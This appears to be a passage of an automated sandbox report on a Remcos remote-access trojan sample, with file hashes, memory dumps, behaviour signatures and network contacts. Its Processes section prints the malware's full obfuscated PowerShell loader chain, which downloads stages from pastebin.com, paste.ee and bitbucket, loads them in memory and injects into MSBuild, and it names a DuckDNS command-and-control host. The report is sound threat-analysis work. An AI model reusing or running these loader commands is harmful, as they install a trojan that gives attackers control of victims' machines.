memory/2072-38-0x00007FFB290C3000-0x00007FFB290C5000-memory.dmp
memory/2072-39-0x00007FFB290C0000-0x00007FFB29B81000-memory.dmp
memory/2080-40-0x00000256A4D70000-0x00000256A4D86000-memory.dmp
memory/1520-41-0x0000000000400000-0x000000000047F000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5c9d2cbff87039dfa98390f51b06f61b |
| SHA1 | 736a64968f091a0fc9b987a45faf66f5f0bf6cd4 |
| SHA256 | b3ff6eac7e6d3f70f21d63f5a34e04322d71319e27bb433f4496663337bf3251 |
| SHA512 | 43831a52799e14bee975a825342ffb51003e12597b664e18918b690f5f8781ab92f7f63428ee29aad05a3c386af5604e0cd0ca8df228b676a9da047fed51a3dd |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 223bd4ae02766ddc32e6145fd1a29301 |
| SHA1 | 900cfd6526d7e33fb4039a1cc2790ea049bc2c5b |
| SHA256 | 1022ec2fed08ff473817fc53893e192a8e33e6a16f3d2c8cb6fd37f49c938e1e |
| SHA512 | 648cd3f8a89a18128d2b1bf960835e087a74cdbc783dbfcc712b3cb9e3a2e4f715e534ba2ef81d89af8f60d4882f6859373248c875ceb26ad0922e891f2e74cc |
memory/1520-45-0x0000000000400000-0x000000000047F000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 235a8eb126d835efb2e253459ab8b089 |
| SHA1 | 293fbf68e6726a5a230c3a42624c01899e35a89f |
| SHA256 | 5ffd4a816ae5d1c1a8bdc51d2872b7dd99e9c383c88001d303a6f64a77773686 |
| SHA512 | a83d17203b581491e47d65131e1efc8060ff04d1852e3415fc0a341c6a9691ef9f4cf4dd29d2f6d0032a49f2ba4bd36c35b3f472f0ce5f78f4bb139124760e92 |
memory/1520-51-0x0000000000400000-0x000000000047F000-memory.dmp
memory/1520-48-0x0000000000400000-0x000000000047F000-memory.dmp
memory/2072-52-0x00007FFB290C0000-0x00007FFB29B81000-memory.dmp
memory/1520-53-0x0000000000400000-0x000000000047F000-memory.dmp
memory/1520-54-0x0000000000400000-0x000000000047F000-memory.dmp
memory/1520-55-0x0000000000400000-0x000000000047F000-memory.dmp
memory/1520-56-0x0000000000400000-0x000000000047F000-memory.dmp
memory/1520-59-0x0000000000400000-0x000000000047F000-memory.dmp
memory/1520-60-0x0000000000400000-0x000000000047F000-memory.dmp
C:\ProgramData\remcos\logs.dat
| MD5 | 57df2cb1bb537dfff03616341a1101fa |
| SHA1 | 78fcf3e70889555c9947c792a267e148ef742da9 |
| SHA256 | 44d7712e7a17c64cc69cfff6afcd2d75f4b4ce27b431bc7e398153a1f48da4c5 |
| SHA512 | 779723dc440229a6545fc328ed3f1c757b171e6251abe30b369742a39289c24f99ed2d9238513d87754f946f296fee356dd62c71662f72e6faf4ed047b9fb314 |
memory/1520-67-0x0000000000400000-0x000000000047F000-memory.dmp
memory/1520-68-0x0000000000400000-0x000000000047F000-memory.dmp
memory/1520-75-0x0000000000400000-0x000000000047F000-memory.dmp
memory/1520-76-0x0000000000400000-0x000000000047F000-memory.dmp
memory/1520-83-0x0000000000400000-0x000000000047F000-memory.dmp
memory/1520-84-0x0000000000400000-0x000000000047F000-memory.dmp
memory/1520-91-0x0000000000400000-0x000000000047F000-memory.dmp
memory/1520-92-0x0000000000400000-0x000000000047F000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-07 21:27
Reported
2024-11-07 21:29
Platform
win11-20241007-en
Max time kernel
148s
Max time network
141s
Command Line
Signatures
Remcos
Remcos family
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | bitbucket.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Obfuscated Files or Information: Command Obfuscation
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4908 set thread context of 3948 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\target.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT☹Hk☹cwB0☹GU☹bQ☹u☹E4☹ZQB0☹C4☹UwBl☹HI☹dgBp☹GM☹ZQBQ☹G8☹aQBu☹HQ☹TQBh☹G4☹YQBn☹GU☹cgBd☹Do☹OgBT☹GU☹YwB1☹HI☹aQB0☹Hk☹U☹By☹G8☹d☹Bv☹GM☹bwBs☹C☹☹PQ☹g☹Fs☹UwB5☹HM☹d☹Bl☹G0☹LgBO☹GU☹d☹☹u☹FM☹ZQBj☹HU☹cgBp☹HQ☹eQBQ☹HI☹bwB0☹G8☹YwBv☹Gw☹V☹B5☹H☹☹ZQBd☹Do☹OgBU☹Gw☹cw☹x☹DI☹Ow☹k☹EM☹QwBS☹Gg☹bQ☹g☹D0☹I☹☹n☹Gg☹d☹B0☹H☹☹cw☹6☹C8☹LwBw☹GE☹cwB0☹GU☹YgBp☹G4☹LgBj☹G8☹bQ☹v☹HI☹YQB3☹C8☹Sg☹2☹HU☹UgBq☹Fo☹cgB2☹Cc☹I☹☹7☹CQ☹Zg☹g☹D0☹I☹☹o☹Fs☹UwB5☹HM☹d☹Bl☹G0☹LgBJ☹E8☹LgBQ☹GE☹d☹Bo☹F0☹Og☹6☹Ec☹ZQB0☹FQ☹ZQBt☹H☹☹U☹Bh☹HQ☹a☹☹o☹Ck☹I☹☹r☹C☹☹JwBk☹Gw☹b☹☹w☹DE☹LgB0☹Hg☹d☹☹n☹Ck☹I☹☹7☹Ek☹bgB2☹G8☹awBl☹C0☹VwBl☹GI☹UgBl☹HE☹dQBl☹HM☹d☹☹g☹C0☹VQBS☹Ek☹I☹☹k☹EM☹QwBS☹Gg☹bQ☹g☹C0☹TwB1☹HQ☹RgBp☹Gw☹ZQ☹g☹CQ☹Zg☹g☹C0☹VQBz☹GU☹QgBh☹HM☹aQBj☹F☹☹YQBy☹HM☹aQBu☹Gc☹I☹☹7☹GM☹bQBk☹C4☹ZQB4☹GU☹I☹☹v☹GM☹I☹☹7☹H☹☹aQBu☹Gc☹I☹☹x☹DI☹Nw☹u☹D☹☹Lg☹w☹C4☹MQ☹g☹Ds☹c☹Bv☹Hc☹ZQBy☹HM☹a☹Bl☹Gw☹b☹☹u☹GU☹e☹Bl☹C☹☹LQBj☹G8☹bQBt☹GE☹bgBk☹C☹☹ew☹k☹GY☹I☹☹9☹C☹☹K☹Bb☹FM☹eQBz☹HQ☹ZQBt☹C4☹SQBP☹C4☹U☹Bh☹HQ☹a☹Bd☹Do☹OgBH☹GU☹d☹BU☹GU☹bQBw☹F☹☹YQB0☹Gg☹K☹☹p☹C☹☹Kw☹g☹Cc☹Z☹Bs☹Gw☹M☹☹x☹C4☹d☹B4☹HQ☹Jw☹p☹C☹☹Ow☹k☹FE☹U☹B0☹GE☹dg☹g☹D0☹I☹☹o☹C☹☹RwBl☹HQ☹LQBD☹G8☹bgB0☹GU☹bgB0☹C☹☹LQBQ☹GE☹d☹Bo☹C☹☹J☹Bm☹C☹☹KQ☹g☹Ds☹SQBu☹HY☹bwBr☹GU☹LQBX☹GU☹YgBS☹GU☹cQB1☹GU☹cwB0☹C☹☹LQBV☹FI☹SQ☹g☹CQ☹UQBQ☹HQ☹YQB2☹C☹☹LQBP☹HU☹d☹BG☹Gk☹b☹Bl☹C☹☹J☹Bm☹C☹☹LQBV☹HM☹ZQBC☹GE☹cwBp☹GM☹U☹Bh☹HI☹cwBp☹G4☹ZwB9☹C☹☹Ow☹k☹FE☹U☹B0☹GE☹dg☹g☹D0☹I☹☹o☹C☹☹RwBl☹HQ☹LQBD☹G8☹bgB0☹GU☹bgB0☹C☹☹LQBQ☹GE☹d☹Bo☹C☹☹J☹Bm☹C☹☹KQ☹g☹Ds☹J☹Bs☹HU☹bwBy☹H☹☹I☹☹9☹C☹☹Jw☹w☹Cc☹I☹☹7☹CQ☹e☹Bt☹HY☹bgBq☹C☹☹PQ☹g☹Cc☹JQBK☹Gs☹UQBh☹HM☹R☹Bm☹Gc☹cgBU☹Gc☹JQ☹n☹C☹☹OwBb☹EI☹eQB0☹GU☹WwBd☹F0☹I☹☹k☹Gc☹aQBr☹Hc☹eQ☹g☹D0☹I☹Bb☹HM☹eQBz☹HQ☹ZQBt☹C4☹QwBv☹G4☹dgBl☹HI☹d☹Bd☹Do☹OgBG☹HI☹bwBt☹EI☹YQBz☹GU☹Ng☹0☹FM☹d☹By☹Gk☹bgBn☹Cg☹I☹☹k☹FE☹U☹B0☹GE☹dg☹u☹HI☹ZQBw☹Gw☹YQBj☹GU☹K☹☹n☹CQ☹J☹☹n☹Cw☹JwBB☹Cc☹KQ☹g☹Ck☹I☹☹7☹Fs☹UwB5☹HM☹d☹Bl☹G0☹LgBB☹H☹☹c☹BE☹G8☹bQBh☹Gk☹bgBd☹Do☹OgBD☹HU☹cgBy☹GU☹bgB0☹EQ☹bwBt☹GE☹aQBu☹C4☹T☹Bv☹GE☹Z☹☹o☹CQ☹ZwBp☹Gs☹dwB5☹Ck☹LgBH☹GU☹d☹BU☹Hk☹c☹Bl☹Cg☹JwBU☹GU☹a☹B1☹Gw☹YwBo☹GU☹cwBY☹Hg☹W☹B4☹Hg☹LgBD☹Gw☹YQBz☹HM☹MQ☹n☹Ck☹LgBH☹GU☹d☹BN☹GU☹d☹Bo☹G8☹Z☹☹o☹Cc☹TQBz☹HE☹QgBJ☹GI☹WQ☹n☹Ck☹LgBJ☹G4☹dgBv☹Gs☹ZQ☹o☹CQ☹bgB1☹Gw☹b☹☹s☹C☹☹WwBv☹GI☹agBl☹GM☹d☹Bb☹F0☹XQ☹g☹Cg☹Jw☹w☹C8☹VgB0☹HU☹d☹BQ☹C8☹Z☹☹v☹GU☹ZQ☹u☹GU☹d☹Bz☹GE☹c☹☹v☹C8☹OgBz☹H☹☹d☹B0☹Gg☹Jw☹g☹Cw☹I☹☹k☹Hg☹bQB2☹G4☹ag☹g☹Cw☹I☹☹n☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹XwBf☹F8☹Xw☹t☹C0☹LQ☹t☹C0☹LQ☹t☹Cc☹L☹☹g☹CQ☹b☹B1☹G8☹cgBw☹Cw☹I☹☹n☹DE☹Jw☹s☹C☹☹JwBS☹G8☹Z☹Bh☹Cc☹I☹☹p☹Ck☹Ow☹=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('☹','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\Admin\AppData\Local\Temp\target.vbs');powershell $Yolopolhggobek;
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$luorp = '0' ;$xmvnj = 'C:\Users\Admin\AppData\Local\Temp\target.vbs' ;[Byte[]] $gikwy = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($gikwy).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/VtutP/d/ee.etsap//:sptth' , $xmvnj , '____________________________________________-------', $luorp, '1', 'Roda' ));"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.0.0.1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| IE | 185.166.142.22:443 | bitbucket.org | tcp |
| US | 3.5.10.154:443 | bbuseruploads.s3.amazonaws.com | tcp |
| IE | 185.166.142.22:443 | bitbucket.org | tcp |
| US | 54.231.164.185:443 | bbuseruploads.s3.amazonaws.com | tcp |
| US | 172.67.187.200:443 | paste.ee | tcp |
| US | 8.8.8.8:53 | sremc.duckdns.org | udp |
| CO | 152.201.184.235:2404 | sremc.duckdns.org | tcp |
| US | 8.8.8.8:53 | geoplugin.net | udp |
| NL | 178.237.33.50:80 | geoplugin.net | tcp |
Files
memory/3680-0-0x00007FF952213000-0x00007FF952215000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wc2gjqv1.0h1.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3680-9-0x00000120DC080000-0x00000120DC0A2000-memory.dmp
memory/3680-10-0x00007FF952210000-0x00007FF952CD2000-memory.dmp
memory/3680-11-0x00007FF952210000-0x00007FF952CD2000-memory.dmp
memory/3680-12-0x00007FF952210000-0x00007FF952CD2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\dll01.txt
| MD5 | 1a215af591b42d73d0254846ebf5ef21 |
| SHA1 | 3a8f8d81abcf9c65a62c1bc043e669a6894a0177 |
| SHA256 | cdd976e886d1c89734decad2d084c76ee8fcd54a652195114478519af8bcdd18 |
| SHA512 | df7c33b6bc1953f9c859793d707aec6f2ee8dd03c7ad8e1437f448567961e254f0864cbc363528a30b994c6dff6e9a0d156290432053bb56d55e0da3b3b42ea3 |
C:\Users\Admin\AppData\Local\Temp\dll01.txt
| MD5 | ed284d77b4400b2bcf8b0abbda2c8f90 |
| SHA1 | c9f8e86ac04eef36be0e46caf815d33afa743756 |
| SHA256 | c9b5f3f368d8497c092c270328f5ffc136121415190062b5a449ce4ecaec4ecd |
| SHA512 | 459808753f7a6f2bdbe145c56ba1f0fa1e7e92afc6fc4b94c3a7c9627598347f73c6e38aeb7ecac2d298ba78e0cdab9792a47ce9d9f36e1b975b857f1a421437 |
memory/4908-35-0x000001C8A6A80000-0x000001C8A6A96000-memory.dmp
memory/3680-36-0x00007FF952210000-0x00007FF952CD2000-memory.dmp
memory/4908-37-0x000001C8A6BF0000-0x000001C8A6C06000-memory.dmp
memory/3948-38-0x0000000000400000-0x000000000047F000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 22e796539d05c5390c21787da1fb4c2b |
| SHA1 | 55320ebdedd3069b2aaf1a258462600d9ef53a58 |
| SHA256 | 7c6c09f48f03421430d707d27632810414e5e2bf2eecd5eb675fecf8b45a9a92 |
| SHA512 | d9cc0cb22df56db72a71504bb3ebc36697e0a7a1d2869e0e0ab61349bda603298fe6c667737b79bf2235314fb49b883ba4c5f137d002e273e79391038ecf9c09 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | bbebf67a3f5b44543a88b662e94deba4 |
| SHA1 | 461a97df36b9f9633162bb135a2bf4ad5a6f094b |
| SHA256 | 79dfb2583bf9f1e846d3dc063b819114efcbddf318b04ce2e5ee04ea78d521ab |
| SHA512 | adffd006bad8c0e36b533f076d4262bfe5c263cbe64450b068c86cb0f01b5d745f469eed294a05d62dbf331b0884f485ba4b871336a830b0be8f4668321742c2 |
memory/3948-42-0x0000000000400000-0x000000000047F000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 367b1c81198bfdcdba813c2c336627a3 |
| SHA1 | 37fe6414eafaaed4abb91c1aafde62c5b688b711 |
| SHA256 | 1141e163d84d5ef0038593c866647f27c55510de2147dc1578130e518a22cced |
| SHA512 | e0493957e6602efb156d372e5e66147056f6e3c2e01996ba9b4e04f82b2b1e4c7236d0e3681dce9ab4911a62546b6a141f1ae731de6e8184e758caf120cf594b |
memory/3948-45-0x0000000000400000-0x000000000047F000-memory.dmp
memory/3948-48-0x0000000000400000-0x000000000047F000-memory.dmp
memory/3680-49-0x00007FF952210000-0x00007FF952CD2000-memory.dmp
memory/3948-50-0x0000000000400000-0x000000000047F000-memory.dmp
memory/3948-51-0x0000000000400000-0x000000000047F000-memory.dmp
memory/3948-52-0x0000000000400000-0x000000000047F000-memory.dmp
memory/3948-53-0x0000000000400000-0x000000000047F000-memory.dmp
memory/3948-57-0x0000000000400000-0x000000000047F000-memory.dmp
memory/3948-58-0x0000000000400000-0x000000000047F000-memory.dmp
C:\ProgramData\remcos\logs.dat
| MD5 | 4dfd22de8690b4b910bea7225c4037df |
| SHA1 | 418fdf094b8b6d38ba83b7e1d279ff3d1c88137a |
| SHA256 | 2c908a8623d5d4484987dc879759dd73eae0f0346e9250add82dd77bd48998ff |
| SHA512 | 666681081dc227985261e44c4b60ef650761b6ab0360dbc681e3aec06e1a693b411ea1c22083d2aae83c740e35aa55e5233bb333c9784fbc0f7a492dc68e4e53 |
memory/3948-65-0x0000000000400000-0x000000000047F000-memory.dmp
memory/3948-66-0x0000000000400000-0x000000000047F000-memory.dmp
memory/3948-73-0x0000000000400000-0x000000000047F000-memory.dmp
memory/3948-74-0x0000000000400000-0x000000000047F000-memory.dmp
memory/3948-82-0x0000000000400000-0x000000000047F000-memory.dmp
memory/3948-81-0x0000000000400000-0x000000000047F000-memory.dmp
memory/3948-90-0x0000000000400000-0x000000000047F000-memory.dmp
memory/3948-89-0x0000000000400000-0x000000000047F000-memory.dmp